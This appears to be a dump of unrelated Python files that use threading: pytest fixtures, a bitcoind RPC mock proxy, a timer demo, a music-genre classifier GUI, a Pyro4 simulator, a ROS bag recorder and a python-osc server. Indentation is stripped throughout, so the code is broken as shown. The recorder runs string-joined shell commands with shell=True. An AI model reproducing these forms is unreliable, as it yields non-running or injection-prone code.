internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
break
time.sleep(1)
internal_sender.join()
for t in threads:
t.join()
assert done, "backend didnt shutdown"
yield stop_backend_func
@pytest.fixture
def publish_util(
mocked_run, mock_server, internal_sender, start_backend, stop_backend, parse_ctx,
):
def fn(metrics=None, history=None, artifacts=None):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
threads = start_backend()
for m in metrics:
internal_sender._publish_metric(m)
for h in history:
internal_sender.publish_history(**h)
for a in artifacts:
internal_sender.publish_artifact(**a)
stop_backend(threads=threads)
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def tbwatcher_util(
mocked_run, mock_server, internal_hm, start_backend, stop_backend, parse_ctx,
):
def fn(write_function, logdir="./", save=True, root_dir="./"):
start_backend()
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
stop_backend()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
|
btcproxy.py
|
""" A bitcoind proxy that allows instrumentation and canned responses
"""
from flask import Flask, request
from bitcoin.rpc import JSONRPCError
from bitcoin.rpc import RawProxy as BitcoinProxy
from cheroot.wsgi import Server
from cheroot.wsgi import PathInfoDispatcher
import decimal
import flask
import json
import logging
import os
import threading
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override it's handling
"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return "{:.8f}".format(float(o))
return super(DecimalEncoder, self).default(o)
class BitcoinRpcProxy(object):
def __init__(self, bitcoind, rpcport=0):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule("/", "API entrypoint", self.proxy, methods=['POST'])
self.rpcport = rpcport
self.mocks = {}
self.mock_counts = {}
self.bitcoind = bitcoind
self.request_count = 0
def _handle_request(self, r):
conf_file = os.path.join(self.bitcoind.bitcoin_dir, 'bitcoin.conf')
brpc = BitcoinProxy(btc_conf_file=conf_file)
method = r['method']
# If we have set a mock for this method reply with that instead of
# forwarding the request.
if method in self.mocks and type(method) == dict:
self.mock_counts[method] += 1
return self.mocks[method]
elif method in self.mocks and callable(self.mocks[method]):
self.mock_counts[method] += 1
return self.mocks[method](r)
try:
reply = {
"result": brpc._call(r['method'], *r['params']),
"error": None,
"id": r['id']
}
except JSONRPCError as e:
reply = {
"error": e.error,
"code": -32603,
"id": r['id']
}
self.request_count += 1
return reply
def proxy(self):
r = json.loads(request.data.decode('ASCII'))
if isinstance(r, list):
reply = [self._handle_request(subreq) for subreq in r]
else:
reply = self._handle_request(r)
response = flask.Response(json.dumps(reply, cls=DecimalEncoder))
response.headers['Content-Type'] = 'application/json'
return response
def start(self):
d = PathInfoDispatcher({'/': self.app})
self.server = Server(('0.0.0.0', self.rpcport), d)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
logging.debug("BitcoinRpcProxy proxying incoming port {} to {}".format(self.rpcport, self.bitcoind.rpcport))
def stop(self):
self.server.stop()
self.proxy_thread.join()
logging.debug("BitcoinRpcProxy shut down after processing {} requests".format(self.request_count))
def mock_rpc(self, method, response=None):
"""Mock the response to a future RPC call of @method
The response can either be a dict with the full JSON-RPC response, or a
function that returns such a response. If the response is None the mock
is removed and future calls will be passed through to bitcoind again.
"""
if response is not None:
self.mocks[method] = response
self.mock_counts[method] = 0
elif method in self.mocks:
del self.mocks[method]
|
demo03.py
|
from threading import Condition, Thread
import time
class PeriodicTimer:
def __init__(self, interval):
self.interval = interval
self._cv = Condition()
self._flag = 0
def run(self):
while True:
time.sleep(self.interval)
with self._cv:
self._flag ^= 1
self._cv.notify_all()
def start(self):
t = Thread(target=self.run)
t.daemon = True
t.start()
def wait_for_tick(self):
with self._cv:
last_flag = self._flag
while last_flag == self._flag:
self._cv.wait()
def countdown(nticks, ptimer):
while nticks > 0:
ptimer. wait_for_tick()
print('T-minus', nticks)
nticks -= 1
def countup(nticks, ptimer):
n = 0
while n < nticks:
ptimer.wait_for_tick()
print('counting', n)
n += 1
if __name__ == '__main__':
ptimer = PeriodicTimer(3)
Thread(target=countdown, args=(10, ptimer)).start()
Thread(target=countup, args=(5, ptimer)).start()
ptimer.start()
|
Server.py
|
import sys
import logging
import thread
import threading
from BaseHTTPServer import HTTPServer as HTTPServer
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from RequestHandler import RequestHandler
from HttpMiddleware import HttpMiddleware, ApiMiddleware
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
# noinspection PyTypeChecker
def get_parser():
"""Get a command line parser for docker-hook."""
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--port",
dest="port",
type=int,
default=8073,
metavar="PORT",
help="port where it listens")
return parser
def load_middleware(server):
"""
:type server: HTTPServer
"""
middleware = HttpMiddleware.HttpMiddleware(HttpMiddleware.HttpMiddlewareFilter())
middleware.registry(ApiMiddleware.ApiMiddleware(HttpMiddleware.HttpMiddlewareFilter('^/api/')))
server.middleware = middleware
def main(port=8073):
"""
:type port: int
"""
server = HTTPServer(('', port), RequestHandler)
# Load Middleware
load_middleware(server)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
logging.info('Server is Setup to port: %s\n', port)
return server
if __name__ == '__main__':
parser = get_parser()
args = parser.parse_args()
server = main(args.port)
if sys.platform != 'darwin':
sys.stdin = open('/dev/tty')
try:
user_input = raw_input('press ctrl+c to stop...\n')
except KeyboardInterrupt:
server.shutdown()
exit()
|
run_qtgui_with_spectogram.py
|
import numpy as np
import torch
import sys
from collections import Counter
from sklearn.preprocessing import LabelEncoder
from librosa.core import load
from librosa.feature import melspectrogram
from librosa import power_to_db
from librosa import amplitude_to_db
from model import genreNet
from config import MODELPATH
from config import GENRES
import librosa.display
import matplotlib.pyplot as plt
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
import time
import os
from PySide2 import QtCore, QtGui, QtWidgets
from PySide2.QtWidgets import QApplication, QWidget, QInputDialog, QLineEdit, QFileDialog
import warnings
import threading
fileName = None
warnings.filterwarnings("ignore")
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(400, 400)
MainWindow.setMaximumSize(400, 400)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(20, 10, 363, 317))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.button2 = QtWidgets.QPushButton(self.widget)
self.button2.setObjectName("button2")
self.gridLayout.addWidget(self.button2, 4, 0, 1, 1)
self.label = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.button1 = QtWidgets.QPushButton(self.widget)
self.button1.setObjectName("button1")
self.gridLayout.addWidget(self.button1, 3, 0, 1, 1)
self.openfile = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.openfile.setFont(font)
self.openfile.setAlignment(QtCore.Qt.AlignCenter)
self.openfile.setObjectName("openfile")
self.gridLayout.addWidget(self.openfile, 1, 0, 1, 1)
self.text = QtWidgets.QPlainTextEdit(self.widget)
font = QtGui.QFont()
font.setPointSize(11)
font.setBold(True)
self.text.setFont(font)
self.text.setObjectName("text")
# self.text.setReadOnly(True)
self.gridLayout.addWidget(self.text, 6, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.button2.setText(_translate("MainWindow", "Откри жанр"))
self.label.setText(_translate("MainWindow", "Отвори музичка датотека и откри го нејзиниот музички жанр"))
self.button1.setText(_translate("MainWindow", "Отвори датотека"))
self.button1.clicked.connect(self.openFile)
self.button2.clicked.connect(self.thread)
self.text.setReadOnly(True)
self.button2.setEnabled(False)
self.pbar = QtWidgets.QProgressBar(self.widget)
self.pbar.setTextVisible(False)
self.pbar.setObjectName("pbar")
self.gridLayout.addWidget(self.pbar, 5, 0, 1, 1)
self.pbar.setMinimum(0)
self.pbar.setMaximum(100)
def openFile(self):
options = QtWidgets.QFileDialog.Options()
global fileName
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
None,
"Open Music Files",
os.getcwd(),
"Music Files (*.mp3);;All Files (*)",
options=options)
if len(fileName) != 0:
self.openfile.setText(os.path.basename(fileName))
self.text.clear()
self.button2.setEnabled(True)
else:
self.openfile.clear()
self.button2.setEnabled(False)
def main(self):
le = LabelEncoder().fit(GENRES)
# ------------------------------- #
## LOAD TRAINED GENRENET MODEL
net = genreNet()
net.load_state_dict(torch.load(MODELPATH, map_location='cpu'))
# ------------------------------- #
## LOAD AUDIO
audio_path = fileName
# os.path.basename()
y, sr = load(audio_path, mono=True, sr=22050)
# ------------------------------- #
## AUDIO SPECTOGRAM
fspec1 = melspectrogram(y, sr=sr, n_mels=128)
# plt.subplot(3, 1, 1)
spec1_amp = amplitude_to_db(fspec1, ref=np.max)
plt.figure(figsize=(10, 4))
librosa.display.specshow(spec1_amp, sr=sr, x_axis='time', y_axis='mel')
plt.colorbar(format='%+2.0f dB')
plt.title('Mel Power Spectogram')
plt.tight_layout()
if os.path.exists('../spectograms/mel_pow_spectogram.png'):
plt.savefig('../spectograms/mel_pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/mel_pow_spectogram.png', dpi=300)
# plt.subplot(3, 1, 2)
plt.figure(figsize=(10, 4))
librosa.display.specshow(fspec1 ** 2, sr=sr, y_axis='log')
plt.colorbar()
plt.title('Power Spectogram')
plt.tight_layout()
if os.path.exists('../spectograms/pow_spectogram.png'):
plt.savefig('../spectograms/pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/pow_spectogram.png', dpi=300)
# plt.subplot(3, 1, 3)
plt.figure(figsize=(10, 4))
librosa.display.specshow(power_to_db(fspec1 ** 2, ref=np.max), sr=sr, y_axis='log', x_axis='time')
plt.colorbar(format='%+2.0f dB')
plt.title('Log-Power Spectrogram')
plt.tight_layout()
if os.path.exists('../spectograms/log_pow_spectogram.png'):
plt.savefig('../spectograms/log_pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/log_pow_spectogram.png', dpi=300)
# ------------------------------- #
## GET CHUNKS OF AUDIO SPECTROGRAMS
S = melspectrogram(y, sr).T
S = S[:-1 * (S.shape[0] % 128)]
num_chunk = S.shape[0] / 128
data_chunks = np.split(S, num_chunk)
# ------------------------------- #
## CLASSIFY SPECTROGRAMS
genres = list()
for i, data in enumerate(data_chunks):
data = torch.FloatTensor(data).view(1, 1, 128, 128)
preds = net(data)
pred_val, pred_index = preds.max(1)
pred_index = pred_index.data.numpy()
pred_val = np.exp(pred_val.data.numpy()[0])
pred_genre = le.inverse_transform(pred_index).item()
if pred_val >= 0.5:
genres.append(pred_genre)
# ------------------------------- #
s = float(sum([v for k, v in dict(Counter(genres)).items()]))
pos_genre = sorted([(k, v / s * 100) for k, v in dict(Counter(genres)).items()], key=lambda x: x[1],
reverse=True)
for genre, pos in pos_genre:
print("%10s: \t%.2f\t%%\n" % (genre, pos))
self.text.insertPlainText("%10s: \t%.2f\t%%\n" % (genre, pos))
self.button1.setEnabled(True)
self.button2.setEnabled(True)
self.pbar.setMinimum(0)
self.pbar.setMaximum(100)
#self.pbar.deleteLater()
return
def thread(self):
self.button1.setEnabled(False)
self.button2.setEnabled(False)
self.pbar.setMinimum(0)
self.pbar.setMaximum(0)
t=threading.Thread(target=self.main, args=())
t.start()
return
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Its alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
stockmarket.py
|
from __future__ import print_function
import random
import threading
import time
import Pyro4
class StockMarket(object):
def __init__(self, marketname, symbols):
self.name = marketname
self.symbolmeans = {}
for symbol in symbols:
self.symbolmeans[symbol] = random.uniform(20, 200)
self.aggregators = []
def generate(self):
quotes = {}
for symbol, mean in self.symbolmeans.items():
if random.random() < 0.2:
quotes[symbol] = round(random.normalvariate(mean, 20), 2)
print("new quotes generated for", self.name)
for aggregator in self.aggregators:
aggregator.quotes(self.name, quotes)
@Pyro4.expose
def listener(self, aggregator):
print("market {0} adding new aggregator".format(self.name))
self.aggregators.append(aggregator)
@Pyro4.expose
def symbols(self):
return list(self.symbolmeans.keys())
def run(self):
def generate_symbols():
while True:
time.sleep(random.random())
self.generate()
thread = threading.Thread(target=generate_symbols)
thread.setDaemon(True)
thread.start()
def main():
nasdaq = StockMarket("NASDAQ", ["AAPL", "CSCO", "MSFT", "GOOG"])
newyork = StockMarket("NYSE", ["IBM", "HPQ", "BP"])
with Pyro4.Daemon() as daemon:
nasdaq_uri = daemon.register(nasdaq)
newyork_uri = daemon.register(newyork)
with Pyro4.locateNS() as ns:
ns.register("example.stockmarket.nasdaq", nasdaq_uri)
ns.register("example.stockmarket.newyork", newyork_uri)
nasdaq.run()
newyork.run()
print("Stockmarkets running.")
daemon.requestLoop()
if __name__ == "__main__":
main()
|
dynamic_recorder.py
|
#!/usr/bin/python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
from pathlib import Path
import shutil
import subprocess
import sys
import threading
import rosbag
import rospkg
import rospy
from ddr_data_recorder.msg import Event
from std_msgs.msg import String
from TopicParser import TopicParser
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
CONNECTIONS_PATH = os.path.join(SCRIPTS_PATH, 'connections')
sys.path.insert(1, CONNECTIONS_PATH)
from connections_generator import ConnectionsGenerator # pylint: disable=wrong-import-position, import-error
## The Dynamic Recoridng functionallity
# Used to dynamically record and kill bags depending on
# various states changes and the topics within those states.
# Uses a few ROS parameters such as split size, path, and
# overlap to run this funciton must me made in the launch file.
class DynamicRecorder: # pylint: disable=too-many-instance-attributes
## The Constructor
def __init__(self):
# The path for the kml.xml file location
xml_path = os.path.dirname(__file__) + rospy.get_param("topicXML")
# A topic parser object used in the record and filter function
self.topic_parser = TopicParser(xml_path)
## @var The message coming off the callback function used to determine
# the event state and what topics will be filtered into what bags
self.data = None
# @var used to change bag sizes
self.split_size = rospy.get_param("splitSize")
## @var This list is going to track the modes that the current active
# bag has been active for. We are going to use this to get all the
# topics for all the modes in this list.
self.active_bag_modes = []
# Temporary, is set on callback
self.bag_name = 'DeezBags'
## Thread Locks
# @var used to change running status
self.run_lock = threading.Lock()
# @var used to send error messages
# TODO: Is this used?
self.thread_lock = threading.Lock()
# @var bool Used to track if we're running or not.
self.is_running = False
self.is_filtering = False
# @var used to change the bag directory location
self.directory = rospy.get_param("directory")
## @var bag_path
# The full path where bags are saved
self.bag_path = Path(self.directory).expanduser()
# Create ddr_bags directory on startup if it does not exist
self.bag_path.mkdir(exist_ok=True)
test_event = rospy.get_param("testEvent")
## @var init_index
# used to initialize the index
if test_event:
self.test_event_dir = self.bag_path.joinpath('test_event_bags')
self.test_event_dir.mkdir(exist_ok=True)
ddr_bags_init = DynamicRecorder.get_mode_counter_index(
self.bag_path)
test_bags_init = DynamicRecorder.get_mode_counter_index(
self.bag_path.joinpath("test_event_bags"))
if ddr_bags_init < test_bags_init:
self.init_index = test_bags_init
else:
self.init_index = ddr_bags_init
else:
self.init_index = DynamicRecorder.get_mode_counter_index(
self.bag_path)
# @var int the directory we're recording
self.bag_process_counter = self.init_index
# Check for existing DDR_MAINBAGS files
split_number = 0
mainbags_list = util.get_mainbags_files_list(self.bag_path) # pylint: disable=no-member
if mainbags_list:
self.init_index += 1
util.sort_mainbags_files_list(mainbags_list) # pylint: disable=no-member
for bag in mainbags_list:
if bag.endswith(".active"):
Path(bag).unlink()
else:
new_bag_name = "{}_floatingMainBag_{}.bag".format(
self.init_index, split_number)
shutil.move(bag, str(self.bag_path.joinpath(new_bag_name)))
split_number += 1
## @var is the value of the splits that increment on filters and
# resets of bag_process_counter
self.bag_split_counter = 0
# @var Checks the previous event ID for any changes in the process
self.previous_event_id = None
# @var Checks the previous event type for any changes in the process
self.previous_event_type = None
self.previous_event_topics = []
self.has_mode_changed = False
## @var List of bags that are currently being filtered. Useful if we
# start filtering multiple bags at once.
self.bags_currently_being_filtered = []
self.ns_add = set()
self.ns_subtract = set()
self.connection_generator = ConnectionsGenerator(
os.path.join(SCRIPTS_PATH, 'dynamic_recording'))
self.update_ros_connections()
## Initializes the node to listen for events and
# hand off messages to callback function
self.ros_connections_sub = rospy.Subscriber(
'/ddr/ros_connections', String, self.ros_connections_callback)
self.event_sub = rospy.Subscriber(
"/ddr/event", Event, self.recording_callback)
self.pub = rospy.Publisher(
"/ddr/bag_filter_status", String, queue_size=10)
rospy.spin()
## Gets the index of the topic to actively
# @returns index int The exact index to start using for recording.
@staticmethod
def get_mode_counter_index(file_path):
file_list = []
index = 0
for file in file_path.iterdir():
if file.is_file() and \
".bag" in file.name and \
"DDR_MAINBAGS" not in file.name:
# 1_idle_3.bag
file_list.append(int(file.name.split("_")[0]))
if file_list:
file_list.sort()
index = file_list[-1]
return index
## Used to safely start dynamic recording
def start_recording(self):
if not self.is_running:
self.is_running = True
self.record()
## Uses the TopicParser class to generate a list of topics
# Requires the event and file location to determine topics
# TODO Fill out this documenation
# @param event_id string
# @param event_type string
# @return topic_list string a space-separated string of all the topics
def topics_to_filter(self, event_id=None, event_type=None):
if event_id is None:
event_id = self.data.eventID
if event_type is None:
event_type = self.data.eventType
self.topic_parser.conditions[event_id] = str(event_type)
self.topic_parser.processGroupsNode()
self.topic_parser.finalizeTopics()
topic_list = self.topic_parser.getFinalTopics()
self.previous_event_topics = topic_list
return topic_list
## Core functionallity of the program. The process is one singular stream of
# recording through the whole program. The topic parser is initialized with
# all of the condition modes in mind to record all topics. Takes the topics
# generated from the topicParser and then creates a rosbag record messages.
# Did not use rosbag API for runtime error purposes.
def record(self):
self.topic_parser.processGroupsNode()
self.topic_parser.finalizeTopics()
topics = self.topic_parser.getSuperset()
self.ns_add = self.topic_parser.getnsAdd()
# TODO: Is this used?
self.ns_subtract = self.topic_parser.getnsSubtract()
## Starting bash command
# Cannot use rosbag API because it does not let us choose settings
dynamic_record_command = ["rosbag record "]
dynamic_record_command.append(
'--split --duration=' + str(self.split_size))
dynamic_record_command.append(
"-O " + str(self.bag_path) + "/DDR_MAINBAGS")
dynamic_record_command.append(
" ".join(topics))
dynamic_record_command.append(
" -e \"(" + " | ".join(self.ns_add) + ")\" ")
# dynamic_record_command.append(
# " -x \"(" + " | ".join(self.ns_subtract) + ")\" ")
dynamic_record_command.append("__name:=DDR_MAIN_RECORDING")
dynamic_record_command.append(">> /dev/null")
## Call Command on Console
try:
subprocess.Popen(" ".join(dynamic_record_command), shell=True)
except subprocess.CalledProcessError:
print("There was a problem getting the rosbag recording started.")
## Used to safely start the filtering thread
def start_filtering(self):
if not self.is_filtering:
thread = threading.Thread(target=self.find_bag_to_filter)
thread.daemon = True
thread.start()
## Finds the bag to filter based on the name of the bag in the file location
# Calls the filter function within it's own seperate thread
def find_bag_to_filter(self):
while self.is_running:
for file in self.bag_path.iterdir():
if file.is_file() and \
file.name.endswith(".bag") and \
"DDR_MAINBAGS" in file.name and \
"filtering" not in file.name and \
file.name not in self.bags_currently_being_filtered:
self.bags_currently_being_filtered.append(file.name)
self.filter_bag(file.name)
## Filters a specific bag file depending on the modes inside of
# self.active_bag_modes.
# @param bag_name_to_filter string The name of the bag file to filter.
def filter_bag(self, bag_name_to_filter):
# Grabs the last mode the bag split was active for.
new_bag_last_mode = self.active_bag_modes[-1]
post_filter_topic_list = self.topics_to_filter(
event_id="topicGroup", event_type=" ".join(self.active_bag_modes))
# Add "filtering" to the bag name while it is being filtered
temp_list = bag_name_to_filter.split("_")
temp_list.insert(2, "filtering")
new_bag_name_with_path = str(self.bag_path) + '/' + '_'.join(temp_list)
bag_path_to_filter = str(self.bag_path) + '/' + bag_name_to_filter
final_bag_path = str(self.bag_path) + '/' + \
str(self.bag_process_counter) + "_" + \
new_bag_last_mode + "_" + \
str(self.bag_split_counter) + '.bag'
with rosbag.Bag(bag_path_to_filter, 'r') as bag:
connection_info = bag.get_type_and_topic_info()
self.connection_generator.add_connection(
final_bag_path, connection_info)
input_arguments_to_filter = []
input_arguments_to_filter.append(os.path.join(
SCRIPTS_PATH,
'dynamic_recording/bag_filter'
))
input_arguments_to_filter.append(bag_path_to_filter)
input_arguments_to_filter.append(new_bag_name_with_path)
input_arguments_to_filter.append(post_filter_topic_list)
try:
proc = subprocess.Popen(" ".join(input_arguments_to_filter),
shell=True, stdout=subprocess.PIPE)
output = proc.stdout.read().decode("utf-8")
# Rename filtered bag to final name
shutil.move(new_bag_name_with_path, final_bag_path)
if output == "1":
if bag_name_to_filter in self.bags_currently_being_filtered:
self.bags_currently_being_filtered.remove(
bag_name_to_filter)
else:
print("Problem removing a bag from list. Bag Name: {} " \
"List of Bags: {}".format(
bag_name_to_filter,
self.bags_currently_being_filtered))
# No matter what, we want to keep the last mode we were in
# for the next filtering of a bag file.
self.active_bag_modes = [self.active_bag_modes[-1]]
with self.run_lock:
print("we're incrementing the bag")
self.bag_split_counter += 1
else:
msg = String()
msg.data = "Error output of bag_filter: " + str(output)
self.pub.publish(msg)
except subprocess.CalledProcessError:
print("There was a problem getting the rosbag recording started.")
## Called on shutdown. Filters the active bag in the directory.
def filter_active_bag(self):
for file in self.bag_path.iterdir():
if file.is_file() and \
file.name.endswith(".bag.active") and \
"DDR_MAINBAGS" in file.name:
self.bags_currently_being_filtered.append(file.name)
self.filter_bag(file.name)
## Takes in a String message and starts a new bag while getting rid of the
# previous one it is done this way to create a desired overlap
# @param data ddr_data_recorder/Event.msg - The message we're handling
def recording_callback(self, data):
if data.dynamicRecord:
self.start_recording()
self.data = data
#Checks the previous event and mode to change record processes
if data.eventID != self.previous_event_id or \
data.eventType != self.previous_event_type:
self.active_bag_modes.append(data.eventType)
print("active_bag_modes: ", self.active_bag_modes)
index = DynamicRecorder.get_mode_counter_index(self.bag_path)
if index > self.init_index:
self.bag_process_counter = index + 1
else:
self.bag_process_counter = self.init_index + 1
print("self.bag_process_counter {}".format(
self.bag_process_counter))
self.bag_split_counter = 0
self.bag_name = data.eventType
print("self.bag_name:" + self.bag_name + ":")
self.previous_event_id = data.eventID
self.previous_event_type = data.eventType
self.has_mode_changed = True
self.start_filtering()
def update_ros_connections(self):
capture_folders = glob.glob(
'{}/*/'.format(os.path.expanduser(self.directory)))
for capture_folder in capture_folders:
self.connection_generator.update_capture_ros_connections(
os.path.abspath(capture_folder))
self.connection_generator.clean_up_persistant(
os.path.expanduser(self.directory))
def ros_connections_callback(self, msg):
self.connection_generator.update_capture_ros_connections(msg.data)
if __name__ == "__main__":
rospy.init_node("data_director_event")
try:
DYNAMIC_RECORDER = DynamicRecorder()
rospy.on_shutdown(DYNAMIC_RECORDER.filter_active_bag)
except rospy.ROSInterruptException:
pass
|
osc_server.py
|
"""OSC Servers that receive UDP packets and invoke handlers accordingly.
Use like this:
dispatcher = dispatcher.Dispatcher()
# This will print all parameters to stdout.
dispatcher.map("/bpm", print)
server = ForkingOSCUDPServer((ip, port), dispatcher)
server.serve_forever()
or run the server on its own thread:
server = ForkingOSCUDPServer((ip, port), dispatcher)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
...
server.shutdown()
Those servers are using the standard socketserver from the standard library:
http://docs.python.org/library/socketserver.html
Alternatively, the AsyncIOOSCUDPServer server can be integrated with an
asyncio event loop:
loop = asyncio.get_event_loop()
server = AsyncIOOSCUDPServer(server_address, dispatcher, loop)
server.serve()
loop.run_forever()
"""
import asyncio
import os
import socketserver
import time
from pythonosc import osc_bundle
from pythonosc import osc_message
from pythonosc import osc_packet
def _call_handlers_for_packet(data, dispatcher):
"""
This function calls the handlers registered to the dispatcher for
every message it found in the packet.
The process/thread granularity is thus the OSC packet, not the handler.
If parameters were registered with the dispatcher, then the handlers are
called this way:
handler('/address that triggered the message',
registered_param_list, osc_msg_arg1, osc_msg_arg2, ...)
if no parameters were registered, then it is just called like this:
handler('/address that triggered the message',
osc_msg_arg1, osc_msg_arg2, osc_msg_param3, ...)
"""
# Get OSC messages from all bundles or standalone message.
try:
packet = osc_packet.OscPacket(data)
for timed_msg in packet.messages:
now = time.time()
handlers = dispatcher.handlers_for_address(
timed_msg.message.address)
if not handlers:
continue
# If the message is to be handled later, then so be it.
if timed_msg.time > now:
time.sleep(timed_msg.time - now)
for handler in handlers:
if handler.args:
handler.callback(
timed_msg.message.address, handler.args, *timed_msg.message)
else:
handler.callback(timed_msg.message.address, *timed_msg.message)
except osc_packet.ParseError:
pass
class _UDPHandler(socketserver.BaseRequestHandler):
"""Handles correct UDP messages for all types of server.
Whether this will be run on its own thread, the server's or a whole new
process depends on the server you instanciated, look at their documentation.
This method is called after a basic sanity check was done on the datagram,
basically whether this datagram looks like an osc message or bundle,
if not the server won't even bother to call it and so no new
threads/processes will be spawned.
"""
def handle(self):
_call_handlers_for_packet(self.request[0], self.server.dispatcher)
def _is_valid_request(request):
"""Returns true if the request's data looks like an osc bundle or message."""
data = request[0]
return (
osc_bundle.OscBundle.dgram_is_bundle(data)
or osc_message.OscMessage.dgram_is_message(data))
class OSCUDPServer(socketserver.UDPServer):
"""Superclass for different flavors of OSCUDPServer"""
def __init__(self, server_address, dispatcher):
super().__init__(server_address, _UDPHandler)
self._dispatcher = dispatcher
def verify_request(self, request, client_address):
"""Returns true if the data looks like a valid OSC UDP datagram."""
return _is_valid_request(request)
@property
def dispatcher(self):
"""Dispatcher accessor for handlers to dispatch osc messages."""
return self._dispatcher
class BlockingOSCUDPServer(OSCUDPServer):
"""Blocking version of the UDP server.
Each message will be handled sequentially on the same thread.
Use this is you don't care about latency in your message handling or don't
have a multiprocess/multithread environment (really?).
"""
class ThreadingOSCUDPServer(socketserver.ThreadingMixIn, OSCUDPServer):
"""Threading version of the OSC UDP server.
Each message will be handled in its own new thread.
Use this when lightweight operations are done by each message handlers.
"""
if hasattr(os, "fork"):
